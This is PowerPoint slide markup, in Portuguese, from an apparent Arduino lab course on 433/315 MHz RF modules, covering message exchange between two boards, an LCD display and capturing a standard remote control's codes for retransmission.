              <a:t> Home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Lâmpadas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Tomadas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Sensores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22B00CC8-1500-4919-96D4-CF7D89C5C0F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668112" y="4341404"/>
            <a:ext cx="2294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Portões e Garagens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Domésticas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Corporativas</a:t>
            </a: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BF6BEABE-0518-4130-AED1-09CA77F87416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7287169" y="4301228"/>
            <a:ext cx="2470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Alarmes Veiculares</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="106" name="Picture 6" descr="Resultado de imagem para garage door&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63708E3-0593-4559-B42F-DC39416C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3" b="5462"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6166699" y="3216294"/>
            <a:ext cx="1042405" cy="104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Resultado de imagem para car remote&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA87BBDB-DF45-4876-A759-C56C38DE9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r="18079"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8743303" y="3216294"/>
            <a:ext cx="1042579" cy="104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0" descr="Resultado de imagem para smart lamp rf&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0CB13F8-205E-4692-9875-0425A55F3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9483" r="17223" b="4198"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3482844" y="3309825"/>
            <a:ext cx="1046813" cy="104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E0FE5E87-DC9B-4EF0-A6CA-4E17C2EAD0A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829283" y="1126323"/>
            <a:ext cx="10323319" cy="1247298"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9907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10B2CC43-F9C7-4BF0-A4B5-5C92ED4C2E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288199" y="1031354"/>
            <a:ext cx="1495143" cy="1436078"/>
            <a:chOff x="2406394" y="3148371"/>
            <a:chExt cx="1280437" cy="1280437"/>
          </a:xfrm>
        </p:grpSpPr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22506183-CDEC-49B5-861D-1FE658187DF8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2406394" y="3148371"/>
              <a:ext cx="1280437" cy="12804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0" name="Picture 2" descr="Resultado de imagem para alarm car remote png&quot;">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B47442-32B6-4A43-BE71-EC6EA3955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111" y="3211573"/>
              <a:ext cx="1155162" cy="1155162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6A0D4F-75B1-4672-BD61-3D18F6F8E02B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772948" y="1048460"/>
            <a:ext cx="935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dispositivos de frequência 433Mhz possuem um melhor funcionamento em ambiente fechado para curtas distâncias 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0E52D66-2ED2-462F-A732-372171EF255B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1790597" y="1682606"/>
            <a:ext cx="9333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dispositivos com frequência 315Mhz funcionam da mesma forma, porém são recomendados para ambientes abertos, pois possuem um comprimento de onda maior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695AE70-EACB-4B2B-A4A7-119805E32C5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3156780" y="2505661"/>
            <a:ext cx="428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Onde são utilizados dispositivos RF433Mhz</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10016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3" grpId="0"/>
      <p:bldP spid="104" grpId="0"/>
      <p:bldP spid="105" grpId="0"/>
      <p:bldP spid="1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5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Atividades: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9D8C72CF-BA9E-4940-AD3E-8B7071B9D88F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="865721" y="1064313"/>
            <a:ext cx="10319208" cy="1631763"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 956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3F807A79-07AD-4251-801C-B4AACD6D472D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3629025" y="1256987"/>
            <a:ext cx="7555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+mj-lt"/>
              </a:rPr>
              <a:t>No laboratório criaremos um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>leitor e transmissor de RF para envio e recebimento de mensagens.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3DF4C6E8-A51C-4C62-B4EC-52ED0BA7F7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3491996" y="1379609"/>
            <a:ext cx="1080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718E0D-D0FD-4B65-A984-327ACCF9E3DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2943683"/>
            <a:ext cx="49720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Enviando Mensagens entre dispositivos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DFB4702-5F03-491E-A214-53B31CBEDA25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535058" y="3325416"/>
            <a:ext cx="1127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Usaremos dois </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Arduinos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> para envio/recebimento de mensagens utilizando um módulo RF433 TX e um módulo RX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C478899D-B8A0-400A-8645-EFCBBA78EA7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3" y="3903004"/>
            <a:ext cx="221229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Usando um LCD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8115521B-9298-4526-A630-3D00181BB076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535058" y="4284737"/>
            <a:ext cx="591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Incluiremos um LCD ao projeto para facilitar a visualização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FE50099-6049-4FEA-BB49-E78A2FFA1A45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3" y="4862326"/>
            <a:ext cx="24005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Clonando dispositivo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E8E79654-4D00-45ED-B9C1-CA960B7410D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535058" y="5244059"/>
            <a:ext cx="987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Clonaremos um dispositivo (controle Remoto) para enviar os códigos através do nosso dispositivo TX.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E8FA58-16DC-4645-A46D-2546B3B1AC4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3636728" y="1899699"/>
            <a:ext cx="7789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+mj-lt"/>
              </a:rPr>
              <a:t>Em seguida clonaremos um controle padrão e controlaremos um dispositivo</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:latin typeface="+mj-lt"/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5016D59-3E96-4992-8DFC-EB14AD725E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3499700" y="2022321"/>
            <a:ext cx="1080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65065880-EDF2-4DFF-BE11-A5FB2835A7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89716" y="1393855"/>
            <a:ext cx="2212342" cy="959838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885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 animBg="1"/>
      <p:bldP spid="81" grpId="0"/>
      <p:bldP spid="82" grpId="0" animBg="1"/>
      <p:bldP spid="3" grpId="0" animBg="1"/>
      <p:bldP spid="123" grpId="0"/>
      <p:bldP spid="128" grpId="0" animBg="1"/>
      <p:bldP spid="129" grpId="0"/>
      <p:bldP spid="130" grpId="0" animBg="1"/>
      <p:bldP spid="131" grpId="0"/>
      <p:bldP spid="53" grpId="0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Preparando o ambiente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6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3076168-EA22-4C49-9A45-67D643AD2C9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358272" y="1421682"/>
            <a:ext cx="11391900" cy="96814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326F081-3C17-4994-8D3D-13EAD35820A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1222823" y="1422151"/>
            <a:ext cx="101347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BR" sz="1600" dirty="0"/>
              <a:t>Conecte o dispositivo em seu computador</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>Selecione a placa: Arduino UNO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>Selecione a porta onde seu dispositivo está conectado (normalmente já estará conectado)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1000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EC34851-340A-48A4-BC35-93844ED0C318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061996" y="1547439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0BB8E211-1D41-4FA7-B657-FA630F964E3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061996" y="1850905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1E84C342-06B6-4C5D-83AD-2AC6D8050C4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061996" y="2150690"/>
            <a:ext cx="94881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8163E5-B680-475E-96E7-C39A08FCCE99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59736" t="17075" r="23617" b="15982"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2554777" y="2823057"/>
            <a:ext cx="3281214" cy="3711100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2E0DC11A-26C1-46D3-96AE-17B436B4BB83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3492500" y="2970971"/>
            <a:ext cx="3022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3141B54-D15E-4928-B7F2-CE66DD25EE38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584700" y="4141911"/>
            <a:ext cx="1944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CFABA330-AB65-456D-ADC7-9821E2735926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4289500" y="4268911"/>
            <a:ext cx="22311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D55153F2-6F40-4818-9C38-1DB65EA28E15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6357313" y="2970847"/>
            <a:ext cx="342774" cy="34277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016B86DC-A57D-4D5C-8FC0-4624E155D13D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6357313" y="3801655"/>
            <a:ext cx="342774" cy="34277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7651F6BD-7194-4988-80A1-B7E125A1B7F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6357313" y="4268914"/>
            <a:ext cx="342774" cy="34277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961A962-A4EC-4CC0-A608-72CB393224CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6385701" y="29196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11601DD-B7A2-476C-A60F-6CC6C6B8A5A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6398401" y="3786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BB55310-F533-4D46-B08F-92BB8B684310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6385701" y="425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97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 animBg="1"/>
      <p:bldP spid="50" grpId="0"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="60" grpId="0" animBg="1"/>
      <p:bldP spid="61" grpId="0" animBg="1"/>
      <p:bldP spid="65" grpId="0" animBg="1"/>
      <p:bldP spid="66" grpId="0" animBg="1"/>
      <p:bldP spid="68" grpId="0" animBg="1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7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Mensagens entre dispositivos:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366651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Uma imagem contendo segurando, céu noturno, computador&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{633A5E11-2564-4F26-95A8-BFB5DBEA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26422"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="-8652"/>
            <a:ext cx="12192001" cy="64870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1E14D5-B85D-4881-AF4E-C691E28AEC5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6466542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F9931-9969-4374-A7F2-E8BC951C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" y="6317854"/>
            <a:ext cx="1863591" cy="4141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324B11-AC86-4971-A12A-1EF88FC05B45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3726"/>
            <a:ext cx="121920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Engrenagem única">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F8D6448-B9A4-4536-9A8B-E3E7F7B6E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6" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Gráfico 7" descr="Engrenagens">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9465F85F-C7CE-4FB6-B089-578DC72BB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560" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Gráfico 8" descr="Pato de borracha">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771A57B7-3F86-487C-9DA0-87C5CD806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7804" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Gráfico 9" descr="Microfone de rádio">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30DBE482-4FFA-4C12-86DC-2A3784DCF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0048" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Gráfico 10" descr="Telefone">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D20AC28-1E0F-454B-B195-BA80B4F45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292" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Gráfico 11" descr="Chave inglesa">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0744C209-B8C4-43D1-BDE9-BFEFA15FF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4536" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Gráfico 12" descr="Ferramentas">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D983343-79D8-41D3-85AB-B36176FE96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56780" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Gráfico 13" descr="Bateria cheia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D442305-71F7-4465-9294-18720DF9E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9024" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Gráfico 14" descr="Controlador de jogo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF7FA250-968A-4566-82E6-8344B14FCA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1268" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Gráfico 15" descr="Câmera de segurança">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A739CBD-8F32-4F4C-8462-F56FEB26FA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3512" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Gráfico 16" descr="Desbloquear">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC4A5A94-8E52-4ED9-8938-CCF3C1C10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5756" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Gráfico 17" descr="Plugue">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{617DC3E4-0918-4FDD-AD76-57BF9F7D1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18000" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Gráfico 18" descr="USB">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2363ECD-817B-45F9-996B-5C75EFABBC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90244" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Gráfico 19" descr="Processador">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD7E93EF-7B89-40B1-A070-E89EB23CE9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62488" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Gráfico 20" descr="Roteador sem fio">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1C8C9B1-91EA-4E0D-959D-E89D7EBD37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34732" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Gráfico 21" descr="Controle remoto">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D66ACD-A48D-4DAB-81D0-3141C87E29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06976" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Gráfico 22" descr="Bluetooth">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4042FDEC-15BC-45A1-ABED-90DBEAAB3A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79220" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Gráfico 23" descr="Robô">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E4FBC60-3358-4085-90C1-ECE30F6C3C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51464" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Gráfico 24" descr="Torre de Celular">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F0F789-EC9B-40C5-B621-FB99F3B744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23708" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Gráfico 25" descr="Smartphone">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C69E4972-8A6B-47FA-9D67-DBFCF04F24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5952" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Gráfico 26" descr="Sem fio">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86058EFB-FA5F-4350-9108-F75E989D80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68196" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Gráfico 27" descr="Wi-Fi">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7061C8A1-801B-4A2B-9399-30E9D9A2C2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40440" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Gráfico 28" descr="Carregando">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
